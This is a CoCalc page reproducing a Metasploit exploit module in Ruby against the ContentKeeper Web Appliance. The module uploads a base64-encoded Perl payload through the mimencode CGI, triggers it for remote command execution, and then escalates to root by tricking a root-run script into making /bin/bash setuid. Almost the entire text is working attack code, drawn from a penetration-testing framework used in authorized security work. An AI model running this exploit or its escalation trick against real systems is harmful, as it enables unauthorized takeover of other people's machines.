Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'ContentKeeper Web Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits the ContentKeeper Web Appliance. Versions prior

18
          to 125.10 are affected. This module exploits a combination of weaknesses

19
          to enable remote command execution as the Apache user. By setting

20
          SkipEscalation to false, this module will attempt to setuid the bash shell.

21
        },

22
        'Author' => [ 'aushack' ],

23
        'Arch'	=> [ ARCH_CMD ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'OSVDB', '54551' ],

27
          [ 'OSVDB', '54552' ],

28
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],

29
        ],

30
        'Privileged'	=> false,

31
        'Payload' => {

32
          'DisableNops' => true,

33
          'Space' => 1024,

34
          'Compat' =>

35
                        {

36
                          'PayloadType' => 'cmd',

37
                          'RequiredCmd' => 'generic perl telnet',

38
                        }

39
        },

40
        'Platform' => ['unix'],

41
        'Targets' => [

42
          [ 'Automatic', {} ]

43
        ],

44
        'DisclosureDate' => '2009-02-25',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        Opt::RPORT(80),

57
        OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),

58
        OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),

59
      ]

60
    )

61
  end

62


63
  def check

64
    connect

65
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")

66
    banner = sock.get_once(-1, 3)

67
    disconnect

68


69
    if (banner =~ /500 Internal/)

70
      return Exploit::CheckCode::Vulnerable

71
    end

72


73
    return Exploit::CheckCode::Safe

74
  end

75


76
  def exploit

77
    exp = "#!/usr/bin/perl\n"

78
    exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"

79
    exp << "use IO::Socket::INET;\n"

80


81
    if (datastore['PAYLOAD'] =~ /perl/)

82
      if not datastore['SkipEscalation']

83
        print_status("Attempting to facilitate root escalation...")

84
        exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.

85
      end

86
      exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!

87
    else

88
      exp << "system(\""

89
      exp << payload.encoded.gsub('"', '\"')

90
      exp << "\");\n"

91
    end

92


93
    body = Rex::Text.encode_base64(exp)

94


95
    connect

96


97
    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"

98
    sploit << "Host: #{datastore['RHOST']}\r\n"

99
    sploit << "Content-Length: #{body.length}\r\n\r\n"

100


101
    print_status("Uploading payload to target...")

102
    sock.put(sploit + body + "\r\n\r\n")

103
    disconnect

104


105
    select(nil, nil, nil, 3) # Wait a few seconds..

106
    print_status("Calling payload...")

107
    connect

108
    req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx

109
    req << "Host: #{datastore['RHOST']}\r\n"

110
    sock.put(req + "\r\n\r\n")

111


112
    handler

113
    disconnect

114
    select(nil, nil, nil, 3) # Wait for session creation.

115
    if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/

116
      print_status("Privilege escalation appears to have worked!")

117
      print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")

118
      print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")

119
    end

120
  end

121
end

122


123